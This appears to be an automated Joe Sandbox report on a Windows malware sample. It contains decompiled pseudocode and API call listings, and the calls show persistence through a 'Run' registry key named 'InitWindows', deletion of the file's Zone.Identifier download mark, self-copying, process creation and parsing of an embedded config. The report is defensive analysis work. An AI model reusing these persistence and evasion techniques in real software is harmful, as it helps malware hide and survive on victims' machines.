                                      0x0025f283
                                      0x0025f28e
                                      0x0025f28f
                                      0x0025f1e4
                                      0x0025f1e7
                                      0x0025f1f0
                                      0x0025f1f0
                                      0x0025f205
                                      0x0025f20c
                                      0x0025f219
                                      0x0025f234
                                      0x0025f23e
                                      0x0025f246
                                      0x0025f24b
                                      0x0025f24d
                                      0x0025f252
                                      0x00000000
                                      0x0025f252
                                      0x0025f24d
                                      0x0025f20c
                                      0x0025f1e2
                                      0x0025f16e
                                      0x0025f10a
                                      0x0025f297
                                      0x0025f29f
                                      0x0025f2aa

                                      APIs
                                        • Part of subcall function 0025D425: GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0025F41F,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0025D444
                                        • Part of subcall function 0025EF0C: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000,?,?,?,0025F0F4,?,?), ref: 0025EF2C
                                        • Part of subcall function 0025EF4C: RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,?,?,00000000,?,?,00261336,?,?), ref: 0025F283
                                        • Part of subcall function 0025D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0025D78C
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025D70F: SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0025D715
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 00253162: lstrcatW.KERNEL32(00000000,?), ref: 00253192
                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0025F166
                                        • Part of subcall function 0025EFFE: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,0025F392,80000001,?), ref: 0025F032
                                        • Part of subcall function 0025EFFE: RegOpenKeyExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0025F04D
                                        • Part of subcall function 0025EFCB: RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,0025F239,?,00000000,?,00000001,?,?,?), ref: 0025EFEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile$lstrcpy$CloseCopyDeleteDirectoryFolderFreeModuleNameOpenPathSpecialValueVirtuallstrcat
                                      • String ID: :Zone.Identifier
                                      • API String ID: 1638721540-2436405130
                                      • Opcode ID: 22130c31ce9e20d46a2dd74087551b198e20e4e58633fb594949187bcb69bd84
                                      • Instruction ID: 6c49a8b1fcc5c0a2e7ca148bd497597a998255205b3797567a32768becde6de3
                                      • Opcode Fuzzy Hash: 22130c31ce9e20d46a2dd74087551b198e20e4e58633fb594949187bcb69bd84
                                      • Instruction Fuzzy Hash: 76515171620519BBCB09EF60CD92CEEB729BF54342B008129BD1656592EF30AF6DCF94
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012E8FDB, Relevance: 4.7, APIs: 3, Instructions: 168COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1560 12e8fdb-12e9002 call 12e8b66 1563 12e9004-12e900d call 12e8bd9 1560->1563 1564 12e9012-12e9019 1560->1564 1572 12e91c5-12e91d4 call 12e1c5e 1563->1572 1566 12e901c-12e9022 1564->1566 1567 12e911e-12e9137 call 12e1f70 1566->1567 1568 12e9028-12e9034 1566->1568 1581 12e913d-12e9142 1567->1581 1568->1566 1570 12e9036-12e903c 1568->1570 1573 12e9116-12e9119 1570->1573 1574 12e9042-12e9048 1570->1574 1580 12e91c4 1573->1580 1578 12e904a-12e9052 GetACP 1574->1578 1579 12e9058-12e9064 IsValidCodePage 1574->1579 1578->1573 1578->1579 1579->1573 1582 12e906a-12e9077 GetCPInfo 1579->1582 1580->1572 1583 12e9176-12e917d 1581->1583 1584 12e9144-12e9149 1581->1584 1586 12e907d-12e909c call 12e1f70 1582->1586 1587 12e9103-12e9109 1582->1587 1583->1581 1588 12e917f-12e91a9 call 12e8b28 1583->1588 1584->1583 1585 12e914b-12e9151 1584->1585 1589 12e916a-12e916c 1585->1589 1599 12e909e-12e90a5 1586->1599 1600 12e90f3 1586->1600 1587->1573 1591 12e910b-12e9111 call 12e8bd9 1587->1591 1602 12e91aa-12e91b9 1588->1602 1593 12e916e-12e9174 1589->1593 1594 12e9153-12e9159 1589->1594 1606 12e91c1-12e91c2 1591->1606 1593->1583 1593->1584 1594->1593 1598 12e915b-12e9166 1594->1598 1598->1589 1604 12e90c8-12e90cb 1599->1604 1605 12e90a7-12e90ac 1599->1605 1603 12e90f6-12e90fe 1600->1603 1602->1602 1607 12e91bb-12e91bc call 12e8c3e 1602->1607 1603->1607 1608 12e90d0-12e90d7 1604->1608 1605->1604 1609 12e90ae-12e90b4 1605->1609 1606->1580 1607->1606 1608->1608 1611 12e90d9-12e90f1 call 12e8b28 1608->1611 1612 12e90bc-12e90be 1609->1612 1611->1603 1614 12e90b6-12e90bb 1612->1614 1615 12e90c0-12e90c6 1612->1615 1614->1612 1615->1604 1615->1605
                                      APIs
                                        • Part of subcall function 012E8B66: GetOEMCP.KERNEL32(00000000,012E8DED,?,012E4B35,013B2144,013B2144,012E4B35), ref: 012E8B91
                                      • GetACP.KERNEL32(00000000,FFF475FF,?,?,?,012E8E34,?,00000000,?,?,?,?,?,?,013B2144,012E4B35), ref: 012E904A
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,FFF475FF,?,?,?,012E8E34,?,00000000,?,?,?,?,?,?,013B2144), ref: 012E905C
                                      • GetCPInfo.KERNEL32(00000000,012E8E34,?,?,012E8E34,?,00000000,?,?,?,?,?,?,013B2144,012E4B35), ref: 012E906F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID:
                                      • API String ID: 546120528-0
                                      • Opcode ID: abf6ef5c1e8c046c2aac923f6d009fdc0c9ef98f804b2df3b0070c076dea8d22
                                      • Instruction ID: e2f7db147bbf9be969f6a971d2ee0627df3d2dd7f8eee87d5f201bf197655aca
                                      • Opcode Fuzzy Hash: abf6ef5c1e8c046c2aac923f6d009fdc0c9ef98f804b2df3b0070c076dea8d22
                                      • Instruction Fuzzy Hash: 4D5144709202069FDF258F2AC89C6BABFE5AF11308F94442FC2868B142E275D1858B91
                                      Uniqueness

                                      Uniqueness Score: 2.59%

                                      Function 00252ECA, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 53UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 91%
                                      			E00252ECA(char** __ecx, void* __eflags, intOrPtr* _a4) {
				char** _v8;
				short* _t15;
				void* _t19;
				int _t39;

				_push(__ecx);
				_v8 = __ecx;
				 *_a4 = 0;
				if(E00252EB9(__ecx) > 0) {
					_t39 = MultiByteToWideChar(0, 2,  *__ecx, E00252EB9(__ecx) + 2, 0, 0) + _t14;
					_t15 = E002559AA(_t39);
					_t26 = _t15;
					E00252EB9(_v8);
					MultiByteToWideChar(0xfde9, 0,  *_v8, 0xffffffff, _t15, _t39);
					_t19 = E00253412( &_v8, _t15); // executed
					E00253264(_a4, _t19); // executed
					E00255A2D(_v8);
					E00255A2D(_t26);
				}
				return _a4;
			}







                                      0x00252ecd
                                      0x00252ed7
                                      0x00252eda
                                      0x00252ee3
                                      0x00252eff
                                      0x00252f03
                                      0x00252f0b
                                      0x00252f0d
                                      0x00252f22
                                      0x00252f2c
                                      0x00252f35
                                      0x00252f3d
                                      0x00252f44
                                      0x00252f44
                                      0x00252f4f

                                      APIs
                                        • Part of subcall function 00252EB9: lstrlenA.KERNEL32(00000000,00252EE1,?,00000000,00000000,;3%,00253109,;3%,00000000,-00000001,?,?,0025333B,00000000,?,?), ref: 00252EC0
                                      • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,?,00000000,00000000,;3%,00253109,;3%,00000000,-00000001,?), ref: 00252EF7
                                        • Part of subcall function 002559AA: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,0025320F,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 002559B8
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,0025333B,00000000,?,?,?,00000000), ref: 00252F22
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$ByteCharMultiVirtualWidelstrcpy$AllocFree
                                      • String ID: ;3%
                                      • API String ID: 4006399363-1745904148
                                      • Opcode ID: 348a72d729fd0123bf3413aa56c4a5fd27198e9a5b7a153cb758d36738194ec2
                                      • Instruction ID: 49740614cd517adbbbb1deafda025e41a262f1f65dddb1582fc16fe096643fd6
                                      • Opcode Fuzzy Hash: 348a72d729fd0123bf3413aa56c4a5fd27198e9a5b7a153cb758d36738194ec2
                                      • Instruction Fuzzy Hash: 3801B571620524FBCB00EBE4DC97D9E76AC9F0A351B104165F905DB292CAB49E188FD8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012E8C3E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,?), ref: 012E8C63
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Info
                                      • String ID:
                                      • API String ID: 1807457897-3916222277
                                      • Opcode ID: 29c3335fc99f19eae2587e9038746ec1bcf7d6aad23cc93d90ea8784aa2fc53e
                                      • Instruction ID: 769b5f6d83b0fcb9f92e98240fd2784a5b181430f1c1e42dbbf65f8c64509523
                                      • Opcode Fuzzy Hash: 29c3335fc99f19eae2587e9038746ec1bcf7d6aad23cc93d90ea8784aa2fc53e
                                      • Instruction Fuzzy Hash: 2341587051434C9EDF268F288C88BFABBEDEB15304F5404EDE6CA86102D2369A45CF60
                                      Uniqueness

                                      Uniqueness Score: 0.05%

                                      Function 0025EB77, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025EB77(void** __ecx, void* __eflags, WCHAR** _a4, WCHAR** _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				int _t12;
				void** _t22;

				_t22 = __ecx;
				E00251052( &_v88, 0, 0x44);
				_v88.cb = 0x44;
				_t12 = CreateProcessW( *_a4,  *_a8, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
				if(_t12 == 0) {
					return 0;
				}
				 *_t22 = _v20.hProcess;
				return 1;
			}







                                      0x0025eb88
                                      0x0025eb8a
                                      0x0025eb98
                                      0x0025ebb2
                                      0x0025ebba
                                      0x00000000
                                      0x0025ebc6
                                      0x0025ebbf
                                      0x00000000

                                      APIs
                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0025EBB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID: D
                                      • API String ID: 963392458-2746444292
                                      • Opcode ID: 0b955e4f358d59c021cf7890f2efdccf9d290389475ddf6e408e3b8dd94180ab
                                      • Instruction ID: ae4797349df23059b844b1c7ebbfee37a2f299b913b15a0552239436255412fb
                                      • Opcode Fuzzy Hash: 0b955e4f358d59c021cf7890f2efdccf9d290389475ddf6e408e3b8dd94180ab
                                      • Instruction Fuzzy Hash: D5F036B1510149AFDB00DFD4DC85DAB77BCFB44749B108425EA069B144E6B49D188764
                                      Uniqueness

                                      Uniqueness Score: 0.30%

                                      Function 012E65F4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 012E663F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpin
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 2593887523-3084827643
                                      • Opcode ID: 9fe00cdcee5c36a10cce7bff9ad90b9d335f7abc9c80c65e69b921cadf952f1c
                                      • Instruction ID: f7b4a3494dd500b064f672beaffda906e47f2c94e20ea84fa2bc375d2685d502
                                      • Opcode Fuzzy Hash: 9fe00cdcee5c36a10cce7bff9ad90b9d335f7abc9c80c65e69b921cadf952f1c
                                      • Instruction Fuzzy Hash: 58F09035650208BBCB266F55DC19CAEBFE5EB14714F404059F91956250DE7249209BC0
                                      Uniqueness

                                      Uniqueness Score: 0.05%

                                      Function 012E6499, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Alloc
                                      • String ID: FlsAlloc
                                      • API String ID: 2773662609-671089009
                                      • Opcode ID: 91c210c890e34cf6be2a0406e41e4d55173f8d036a7b343ae607a1e001503454
                                      • Instruction ID: 5421242918c89a46f3da1eebd07bb26af1e875fb180c4868e2a968ea58bd1996
                                      • Opcode Fuzzy Hash: 91c210c890e34cf6be2a0406e41e4d55173f8d036a7b343ae607a1e001503454
                                      • Instruction Fuzzy Hash: CCE0E530A913187BC33AAB659C2A97EBBD9DB75B21F80019DF90556340CE710A1087D5
                                      Uniqueness

                                      Uniqueness Score: 0.07%

                                      Function 012E249C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 012E24B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: try_get_function
                                      • String ID: FlsAlloc
                                      • API String ID: 2742660187-671089009
                                      • Opcode ID: 6a57065ebe828c9027c8c56b764a48962502f48a0e97fdebe6f2e49b570114f2
                                      • Instruction ID: ddfb421779ac52f1d06d1e3dc5313e212c68fd2a8a8d1b31092d0565c13e7173
                                      • Opcode Fuzzy Hash: 6a57065ebe828c9027c8c56b764a48962502f48a0e97fdebe6f2e49b570114f2
                                      • Instruction Fuzzy Hash: 9ED0C232781324A3C12B31866C1EBAB7BDCCB00AA2F0000E2EB0C51654C551940043D0
                                      Uniqueness

                                      Uniqueness Score: 0.35%

                                      Function 002555A0, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 154sleepUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E002555A0(char __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v76;
				char _v100;
				char _v108;
				char _v148;
				void* _t83;
				void* _t94;
				void* _t102;
				void* _t106;
				intOrPtr* _t126;
				char _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr* _t188;
				void* _t189;

				_t189 = __eflags;
				_t175 = __ecx;
				_v8 = __ecx;
				Sleep(0x1f4); // executed
				E0025E3ED( &_v100, _t189);
				E0025E2E4( &_v100, E0025FBFC()); // executed
				_t83 = E002531EC( &_v12, ".bss"); // executed
				E0025E257( &_v100,  &_v148, _t83); // executed
				E00255A2D(_v12);
				E00252E79( &_v16,  &_v108);
				E00252CCC(_t175 + 0x44,  &_v16);
				E00252E66( &_v16);
				E002554F2(_t175,  &_v24);
				_t126 = _v24;
				_t184 =  *_t126;
				_t94 = E0025FC1E( &_v12, _t126 + 4, _t184); // executed
				E00253264(_t175 + 0x10, _t94); // executed
				E00255A2D(_v12);
				_t176 = _t184 + 4;
				 *((intOrPtr*)(_v8 + 0x14)) =  *((intOrPtr*)(_t126 + _t176));
				_t185 =  *((intOrPtr*)(_t126 + _t176 + 4));
				_t177 = _t176 + 8;
				E00253264(_v8 + 0x28, E0025FC1E( &_v12, _t126 + _t177, _t185));
				E00255A2D(_v12);
				_t178 = _t177 + _t185;
				 *((intOrPtr*)(_v8 + 0x18)) =  *((char*)(_t126 + _t178));
				_t186 =  *((intOrPtr*)(_t126 + _t178 + 1));
				_t179 = _t178 + 5;
				_t102 = E0025FC1E( &_v12, _t126 + _t179, _t186); // executed
				E00253264(_v8 + 0x1c, _t102); // executed
				E00255A2D(_v12);
				_t180 = _t179 + _t186;
				 *((intOrPtr*)(_v8 + 0x20)) =  *((char*)(_t126 + _t180));
				_t187 =  *((intOrPtr*)(_t126 + _t180 + 1));
				_t181 = _t180 + 5;
				_t106 = E0025FC1E( &_v12, _t126 + _t181, _t187); // executed
				E00253264(_v8 + 0x24, _t106); // executed
				E00255A2D(_v12);
				_t182 = _t181 + _t187;
				_t188 = _v8;
				 *((intOrPtr*)(_t188 + 0x2c)) =  *((intOrPtr*)(_t126 + _t182));
				 *((intOrPtr*)(_t188 + 0x34)) =  *((char*)(_t126 + _t182 + 4));
				 *((intOrPtr*)(_t188 + 0x38)) =  *((char*)(_t126 + _t182 + 5));
				 *((intOrPtr*)(_t188 + 0x3c)) =  *((char*)(_t126 + _t182 + 6));
				 *((intOrPtr*)(_t188 + 0x40)) =  *((char*)(_t126 + _t182 + 7));
				E0025FC1E( &_v8, _t126 + 4 + _t182 + 8,  *((intOrPtr*)(_t126 + _t182 + 8))); // executed
				E00253264(_t188 + 0x30,  &_v8); // executed
				 *_t188 = 1;
				 *((intOrPtr*)(_t188 + 4)) = 1;
				E00255A2D(_v8);
				E00252E66( &_v24);
				E00252E66( &_v108);
				_t165 = _v56;
				if(_v56 != 0) {
					E00251DB4(_t165, _t165);
				}
				_v56 = 0;
				_v48 = 0;
				_v52 = 0;
				E00252E66( &_v76);
				return E0025DE8B( &_v100, 0);
			}

































                                      0x002555a0
                                      0x002555ac
                                      0x002555b3
                                      0x002555b6
                                      0x002555bf
                                      0x002555cd
                                      0x002555da
                                      0x002555ea
                                      0x002555f2
                                      0x002555fe
                                      0x0025560a
                                      0x00255612
                                      0x0025561d
                                      0x00255622
                                      0x00255628
                                      0x0025562e
                                      0x00255638
                                      0x00255640
                                      0x00255648
                                      0x0025564e
                                      0x00255654
                                      0x00255658
                                      0x0025566c
                                      0x00255674
                                      0x0025567c
                                      0x00255682
                                      0x00255688
                                      0x0025568c
                                      0x00255693
                                      0x002556a0
                                      0x002556a8
                                      0x002556b0
                                      0x002556b6
                                      0x002556bc
                                      0x002556c0
                                      0x002556c7
                                      0x002556d4
                                      0x002556dc
                                      0x002556e1
                                      0x002556e6
                                      0x002556ef
                                      0x002556f7
                                      0x002556ff
                                      0x00255707
                                      0x00255712
                                      0x0025571a
                                      0x00255727
                                      0x00255732
                                      0x00255734
                                      0x00255737
                                      0x0025573f
                                      0x00255747
                                      0x0025574c
                                      0x00255751
                                      0x00255754
                                      0x00255754
                                      0x0025575e
                                      0x00255761
                                      0x00255764
                                      0x00255767
                                      0x00255778

                                      APIs
                                      • Sleep.KERNEL32(000001F4,?,?,00000000), ref: 002555B6
                                        • Part of subcall function 0025FBFC: MessageBoxA.USER32(00000000,Settings not found !,DEBUG,00000000), ref: 0025FC14
